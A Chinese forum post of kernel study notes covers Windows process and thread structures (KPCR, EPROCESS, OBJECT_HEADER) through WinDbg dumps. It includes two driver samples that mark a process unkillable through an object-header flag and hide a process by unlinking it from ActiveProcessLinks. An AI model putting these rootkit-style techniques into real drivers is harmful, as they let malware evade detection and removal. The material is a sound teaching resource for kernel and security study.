四、进程线程
4.1.WRK安装
1.Project-->New Project-->选择wrk目录-->ok
2.Add and Remove Project Files--->选中四个文件-->Add Tree
3.搜索
4.2.KPCR
kpcr:cpu核控制块,cpu一个核一个kpcr结构
fs=0x30 在内核中的时候,指向的是kpcr结构
fs=0x3b 在应用层的时候,指向的是当前线程的TEB
1.kpcr结构
kd> dt _KPCR
ntdll!_KPCR
+0x000 NtTib : _NT_TIB
+0x000 Used_ExceptionList : Ptr32 _EXCEPTION_REGISTRATION_RECORD
+0x004 Used_StackBase : Ptr32 Void
+0x008 Spare2 : Ptr32 Void
+0x00c TssCopy : Ptr32 Void
+0x010 ContextSwitches : Uint4B
+0x014 SetMemberCopy : Uint4B
+0x018 Used_Self : Ptr32 Void //指向自己或者线程的TEB
+0x01c SelfPcr : Ptr32 _KPCR //一定会指向kpcr自己
+0x020 Prcb : Ptr32 _KPRCB //用于定位+0x120 _KPCR的位置
+0x024 Irql : UChar
+0x028 IRR : Uint4B
+0x02c IrrActive : Uint4B
+0x030 IDR : Uint4B
+0x034 KdVersionBlock : Ptr32 Void
+0x038 IDT : Ptr32 _KIDTENTRY
+0x03c GDT : Ptr32 _KGDTENTRY
+0x040 TSS : Ptr32 _KTSS
+0x044 MajorVersion : Uint2B
+0x046 MinorVersion : Uint2B
+0x048 SetMember : Uint4B
+0x04c StallScaleFactor : Uint4B
+0x050 SpareUnused : UChar
+0x051 Number : UChar //当前跑在哪个核上
+0x052 Spare0 : UChar
+0x053 SecondLevelCacheAssociativity : UChar
+0x054 VdmAlert : Uint4B
+0x058 KernelReserved : [14] Uint4B
+0x090 SecondLevelCacheSize : Uint4B
+0x094 HalReserved : [16] Uint4B
+0x0d4 InterruptMode : Uint4B
+0x0d8 Spare1 : UChar
+0x0dc KernelReserved2 : [17] Uint4B
+0x120 PrcbData : _KPRCB //KPCR扩展块
2.KiProcessorBlock
扩展块
3.+0x000 NtTib
ntdll!_NT_TIB
+0x000 ExceptionList : Ptr32 _EXCEPTION_REGISTRATION_RECORD
+0x004 StackBase : Ptr32 Void
+0x008 StackLimit : Ptr32 Void //当前这个核上跑的线程的堆栈的栈顶和栈底
+0x00c SubSystemTib : Ptr32 Void
+0x010 FiberData : Ptr32 Void
+0x010 Version : Uint4B
+0x014 ArbitraryUserPointer : Ptr32 Void
+0x018 Self : Ptr32 _NT_TIB
4.3.函数类型
Windows是微内核,分内核结构和执行体结构
函数类型
Ex:执行体函数,进程、线程、链表、对象属性、赋值、取值、加锁相关
Ke:内核函数,大部分是导出
Ki:微内核函数,不导出,内部自己使用。进程、线程、cpu、调度相关
Ps:执行体函数,进程、线程相关
Mm:内存相关函数,一般导出
Mi:内存相关函数,Mm函数底层就是调用Mi,不导出
Io:文件、设备相关,导出
CC:文件缓存
Rtl:导出函数,一般是运行库,字符串操作等
Zw:SSDT,但是Zw不需要修改线程的先前模式
Nt:Zw函数会调用到Nt,本身Zw函数不实现功能
CM:注册表
hal:硬件函数
Ob:对象管理器,句柄,创建内核对象,查询内核对象等
Pnp:电源管理
Psp:执行体函数,进程、线程。Ps函数实现复杂功能的时候,都是调用Psp
4.4.KPROCESS
KPROCESS
kd> dt _KPROCESS
ntdll!_KPROCESS
+0x000 Header : _DISPATCHER_HEADER
+0x010 ProfileListHead : _LIST_ENTRY //性能分析
+0x018 DirectoryTableBase : Uint4B //CR3
+0x01c LdtDescriptor : _KGDTENTRY
+0x024 Int21Descriptor : _KIDTENTRY
+0x02c ThreadListHead : _LIST_ENTRY //当前进程有多少线程
+0x034 ProcessLock : Uint4B //自旋锁
+0x038 Affinity : _KAFFINITY_EX //亲核性
+0x044 ReadyListHead : _LIST_ENTRY //就绪链表
+0x04c SwapListEntry : _SINGLE_LIST_ENTRY //交换链表
+0x050 ActiveProcessors : _KAFFINITY_EX
+0x05c AutoAlignment : Pos 0, 1 Bit
+0x05c DisableBoost : Pos 1, 1 Bit
+0x05c DisableQuantum : Pos 2, 1 Bit //时间碎片
+0x05c ActiveGroupsMask : Pos 3, 1 Bit
+0x05c ReservedFlags : Pos 4, 28 Bits
+0x05c ProcessFlags : Int4B
+0x060 BasePriority : Char //初始优先级
+0x061 QuantumReset : Char //时间碎片值
+0x062 Visited : UChar
+0x063 Unused3 : UChar
+0x064 ThreadSeed : [1] Uint4B
+0x068 IdealNode : [1] Uint2B
+0x06a IdealGlobalNode : Uint2B
+0x06c Flags : _KEXECUTE_OPTIONS
+0x06d Unused1 : UChar
+0x06e IopmOffset : Uint2B
+0x070 Unused4 : Uint4B
+0x074 StackCount : _KSTACK_COUNT
+0x078 ProcessListEntry : _LIST_ENTRY
+0x080 CycleTime : Uint8B
+0x088 KernelTime : Uint4B
+0x08c UserTime : Uint4B //统计线程开始到死亡活动的时间
+0x090 VdmTrapcHandler : Ptr32 Void
4.5.EPROCESS
kd> dt _EPROCESS 88079d40
ntdll!_EPROCESS
+0x000 Pcb : _KPROCESS
+0x098 ProcessLock : _EX_PUSH_LOCK //自旋锁
+0x0a0 CreateTime : _LARGE_INTEGER 0x01d88c86`b179ff84 //进程创建的时间
+0x0a8 ExitTime : _LARGE_INTEGER 0x0 //进程退出的时间
+0x0b0 RundownProtect : _EX_RUNDOWN_REF
+0x0b4 UniqueProcessId : 0x00000cb8 Void //进程pid
+0x0b8 ActiveProcessLinks : _LIST_ENTRY [ 0x83f59c88 - 0x88067540 ] //活动进程链表
+0x0c0 ProcessQuotaUsage : [2] 0x3688
+0x0c8 ProcessQuotaPeak : [2] 0x373c
+0x0d0 CommitCharge : 0x602
+0x0d4 QuotaBlock : 0x87acf1c0 _EPROCESS_QUOTA_BLOCK
+0x0d8 CpuQuotaBlock : (null)
+0x0dc PeakVirtualSize : 0x8156000
+0x0e0 VirtualSize : 0x8115000
+0x0e4 SessionProcessLinks : _LIST_ENTRY [ 0x8f18f010 - 0x87d6adbc ] //当前用户进程链表
+0x0ec DebugPort : (null) //如果有值,说明正在被调试
+0x0f0 ExceptionPortData : 0x879e0f00 Void
+0x0f0 ExceptionPortValue : 0x879e0f00
+0x0f0 ExceptionPortState : 0y000
+0x0f4 ObjectTable : 0xa4738a78 _HANDLE_TABLE //句柄表
+0x0f8 Token : _EX_FAST_REF
+0x0fc WorkingSetPage : 0xf226 //用了多少页
+0x100 AddressCreationLock : _EX_PUSH_LOCK
+0x104 RotateInProgress : (null)
+0x108 ForkInProgress : (null)
+0x10c HardwareTrigger : 0
+0x110 PhysicalVadRoot : (null)
+0x114 CloneRoot : (null)
+0x118 NumberOfPrivatePages : 0x44e
+0x11c NumberOfLockedPages : 0
+0x120 Win32Process : 0xffa40510 Void
+0x124 Job : (null)
+0x128 SectionObject : 0x99dff928 Void
+0x12c SectionBaseAddress : 0x00be0000 Void
+0x130 Cookie : 0x910986dc
+0x134 Spare8 : 0
+0x138 WorkingSetWatch : (null)
+0x13c Win32WindowStation : 0x00000038 Void
+0x140 InheritedFromUniqueProcessId : 0x00000554 Void
+0x144 LdtInformation : (null)
+0x148 VdmObjects : (null)
+0x14c ConsoleHostProcess : 0
+0x150 DeviceMap : 0x83650490 Void
+0x154 EtwDataSource : (null)
+0x158 FreeTebHint : 0x7ffde000 Void
+0x160 PageDirectoryPte : _HARDWARE_PTE_X86
+0x160 Filler : 0
+0x168 Session : 0x8f18f000 Void
+0x16c ImageFileName : [15] "notepad.exe" //进程名字
+0x17b PriorityClass : 0x2 ''
+0x17c JobLinks : _LIST_ENTRY [ 0x0 - 0x0 ]
+0x184 LockedPagesList : (null)
+0x188 ThreadListHead : _LIST_ENTRY [ 0x85da7298 - 0x88094fb0 ] //线程链表
+0x190 SecurityPort : (null)
+0x194 PaeTop : 0x86b79560 Void
+0x198 ActiveThreads : 4 //当前进程有多少个线程
+0x19c ImagePathHash : 0xeb1b961a
+0x1a0 DefaultHardErrorProcessing : 1
+0x1a4 LastThreadExitStatus : 0n0
+0x1a8 Peb : 0x7ffdf000 _PEB //PEB
+0x1ac PrefetchTrace : _EX_FAST_REF
+0x1b0 ReadOperationCount : _LARGE_INTEGER 0x1c
+0x1b8 WriteOperationCount : _LARGE_INTEGER 0x4
+0x1c0 OtherOperationCount : _LARGE_INTEGER 0x1fa
+0x1c8 ReadTransferCount : _LARGE_INTEGER 0x4b9031
+0x1d0 WriteTransferCount : _LARGE_INTEGER 0x2a38
+0x1d8 OtherTransferCount : _LARGE_INTEGER 0x126c
+0x1e0 CommitChargeLimit : 0
+0x1e4 CommitChargePeak : 0xb49
+0x1e8 AweInfo : (null)
+0x1ec SeAuditProcessCreationInfo : _SE_AUDIT_PROCESS_CREATION_INFO //进程名完整路劲
+0x1f0 Vm : _MMSUPPORT
+0x25c MmProcessLinks : _LIST_ENTRY [ 0x83f600f0 - 0x880676e4 ]
+0x264 HighestUserAddress : 0x7fff0000 Void
+0x268 ModifiedPageCount : 0x209
+0x26c Flags2 : 0x200d000
+0x26c JobNotReallyActive : 0y0
+0x26c AccountingFolded : 0y0
+0x26c NewProcessReported : 0y0
+0x26c ExitProcessReported : 0y0
+0x26c ReportCommitChanges : 0y0
+0x26c LastReportMemory : 0y0
+0x26c ReportPhysicalPageChanges : 0y0
+0x26c HandleTableRundown : 0y0
+0x26c NeedsHandleRundown : 0y0
+0x26c RefTraceEnabled : 0y0
+0x26c NumaAware : 0y0
+0x26c ProtectedProcess : 0y0 //保护进程
+0x26c DefaultPagePriority : 0y101
+0x26c PrimaryTokenFrozen : 0y1
+0x26c ProcessVerifierTarget : 0y0
+0x26c StackRandomizationDisabled : 0y0
+0x26c AffinityPermanent : 0y0
+0x26c AffinityUpdateEnable : 0y0
+0x26c PropagateNode : 0y0
+0x26c ExplicitAffinity : 0y0
+0x270 Flags : 0x144d0801
+0x270 CreateReported : 0y1
+0x270 NoDebugInherit : 0y0
+0x270 ProcessExiting : 0y0
+0x270 ProcessDelete : 0y0
+0x270 Wow64SplitPages : 0y0
+0x270 VmDeleted : 0y0
+0x270 OutswapEnabled : 0y0
+0x270 Outswapped : 0y0
+0x270 ForkFailed : 0y0
+0x270 Wow64VaSpace4Gb : 0y0
+0x270 AddressSpaceInitialized : 0y10
+0x270 SetTimerResolution : 0y0
+0x270 BreakOnTermination : 0y0
+0x270 DeprioritizeViews : 0y0
+0x270 WriteWatch : 0y0
+0x270 ProcessInSession : 0y1
+0x270 OverrideAddressSpace : 0y0
+0x270 HasAddressSpace : 0y1
+0x270 LaunchPrefetched : 0y1
+0x270 InjectInpageErrors : 0y0
+0x270 VmTopDown : 0y0 //申请的内存地址从大地址开始,默认是小地址
+0x270 ImageNotifyDone : 0y1
+0x270 PdeUpdateNeeded : 0y0
+0x270 VdmAllowed : 0y0
+0x270 CrossSessionCreate : 0y0
+0x270 ProcessInserted : 0y1
+0x270 DefaultIoPriority : 0y010
+0x270 ProcessSelfDelete : 0y0
+0x270 SetTimerResolutionLink : 0y0
+0x274 ExitStatus : 0n259 //判断进程是否退出,不是259就是退出
+0x278 VadRoot : _MM_AVL_TABLE
+0x298 AlpcContext : _ALPC_PROCESS_CONTEXT
+0x2a8 TimerResolutionLink : _LIST_ENTRY [ 0x0 - 0x0 ]
+0x2b0 RequestedTimerResolution : 0
+0x2b4 ActiveThreadsHighWatermark : 6
+0x2b8 SmallestTimerResolution : 0
+0x2bc TimerResolutionStackRecord : (null)
4.6.OBJECT-HEADER
EPROCESS有一个对象头object_header,在减18位置
kd> dt _OBJECT_HEADER 88079d40-0x18
nt!_OBJECT_HEADER
+0x000 PointerCount : 0n54 //引用次数
+0x004 HandleCount : 0n3
+0x004 NextToFree : 0x00000003 Void
+0x008 Lock : _EX_PUSH_LOCK
+0x00c TypeIndex : 0x7 '' //对象类型
+0x00d TraceFlags : 0 ''
+0x00e InfoMask : 0x8 ''
+0x00f Flags : 0 '' //把flags改成4,可以保护进程
+0x010 ObjectCreateInfo : 0x87acf1c0 _OBJECT_CREATE_INFORMATION
+0x010 QuotaBlockCharged : 0x87acf1c0 Void
+0x014 SecurityDescriptor : 0x8ce7aeca Void
+0x018 Body : _QUAD
kd> eb 88079d40-0x18+f 4
kd> g
4.7.保护进程
DriverEntry.c
#include <ntifs.h>
EXTERN_C UCHAR * PsGetProcessImageFileName(
__in PEPROCESS Process
);
//设置Object_Header的Flags位
VOID SetProcessFlags(PEPROCESS Process)
{
PUCHAR ObjectHeader = NULL;
#ifdef _WIN64
ObjectHeader = ((PUCHAR)Process - 0x30);
*(ObjectHeader + 0x1b) |= 4;
#else
ObjectHeader = ((PUCHAR)Process - 0x18);
*(ObjectHeader + 0xf) |= 4;
#endif
}
VOID CloseProcessFlags(PEPROCESS Process)
{
PUCHAR ObjectHeader = NULL;
#ifdef _WIN64
ObjectHeader = ((PUCHAR)Process - 0x30);
*(ObjectHeader + 0x1b) &= ~4;
#else
ObjectHeader = ((PUCHAR)Process - 0x18);
*(ObjectHeader + 0xf) &= ~4;
#endif
}
PEPROCESS FindProceeByName(char* name)
{
PEPROCESS findProcess = NULL;
for (int i = 4; i < 0x1000000; i += 4)
{
PEPROCESS Process = NULL;
//根据pid获取进程对象
NTSTATUS status = PsLookupProcessByProcessId((HANDLE)i, &Process);
if (!NT_SUCCESS(status))
{
continue;
}
//获取进程名字
PUCHAR processName = PsGetProcessImageFileName(Process);
if (processName && _stricmp(processName, name) == 0)
{
findProcess = Process;
break;
}
ObDereferenceObject(Process); //引用计数-1
}
return findProcess;
}
VOID DriverUnload(PDRIVER_OBJECT pDriver)
{
PEPROCESS Process = FindProceeByName("Dbgview.exe");
if (!Process)
{
return;
}
CloseProcessFlags(Process);
ObDereferenceObject(Process); //引用计数-1
}
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriver, PUNICODE_STRING pReg)
{
PEPROCESS Process = FindProceeByName("Dbgview.exe");
if (!Process)
{
return STATUS_UNSUCCESSFUL;
}
SetProcessFlags(Process);
pDriver->DriverUnload = DriverUnload;
return STATUS_SUCCESS;
}
4.8.进程断链
DriverEntry.c
#include <ntifs.h>
PEPROCESS FindProcessByName(PWCH name)
{
PEPROCESS Process = NULL;
PEPROCESS findProcess = NULL;
for (int i = 8; i < 0x1000000; i += 4)
{
NTSTATUS status = PsLookupProcessByProcessId((HANDLE)i,&Process);
if (!NT_SUCCESS(status))
{
continue;
}
PUNICODE_STRING ProcessName = NULL;
status = SeLocateProcessImageName(Process, &ProcessName); //进程全路劲名字
if (!NT_SUCCESS(status))
{
ObDereferenceObject(Process);
continue;
}
if (ProcessName->Length)
{
_wcsupr(ProcessName->Buffer);
if (wcsstr(ProcessName->Buffer, name) != 0)
{
findProcess = Process;
ExFreePoolWithTag(ProcessName,0); //释放
break;
}
}
ExFreePoolWithTag(ProcessName, 0);
ObDereferenceObject(Process);
}
return findProcess;
}
ULONG GetProcessActiveProcessLinkOffset()
{
static ULONG offset = 0;
if (offset) return offset;
UNICODE_STRING Name;
RtlInitUnicodeString(&Name,L"PsGetProcessId");
PUCHAR func = (PUCHAR)MmGetSystemRoutineAddress(&Name);
for (int i = 0; i < 100; i ++)
{
if (func[i] == 0x8b && func[i + 1] == 0x80)
{
offset = *(PULONG)(func + i + 2);
offset += 4; //通过特征码定位
break;
}
}
return offset;
}
VOID DriverUnload(PDRIVER_OBJECT pDriver)
{
}
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriver, PUNICODE_STRING pReg)
{
PEPROCESS Process = FindProcessByName(L"DBGVIEW.EXE");
ULONG offset = GetProcessActiveProcessLinkOffset();
RemoveEntryList((PUCHAR)Process + offset); //断链
InitializeListHead((PUCHAR)Process + offset); //初始化链表
ObDereferenceObject(Process);
pDriver->DriverUnload = DriverUnload;
return STATUS_SUCCESS;
}
4.9.线程查找
KTHREAD
+0x074 WaitListEntry : _LIST_ENTRY //就绪线程
dt nt!_KPRCB
//链表包含32个成员,对应就绪位图的32位。就绪位图的位为1,说明这个链表对应的索引成员有就绪线程
+0x3220 DispatcherReadyListHead : [32] _LIST_ENTRY
//就绪位图,二进制32位,
+0x31ec ReadySummary : Uint4B
KiFindReadyThread函数逆向分析,首先按x,进到KiSerachForNewThread,找到KiFindReadyThread的三个参数
然后开始分析KiFindReadyThread
4.10.线程主动切换
KiSwapThread
[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法
最后于 2022-8-14 14:57
被zhang_derek编辑
,原因: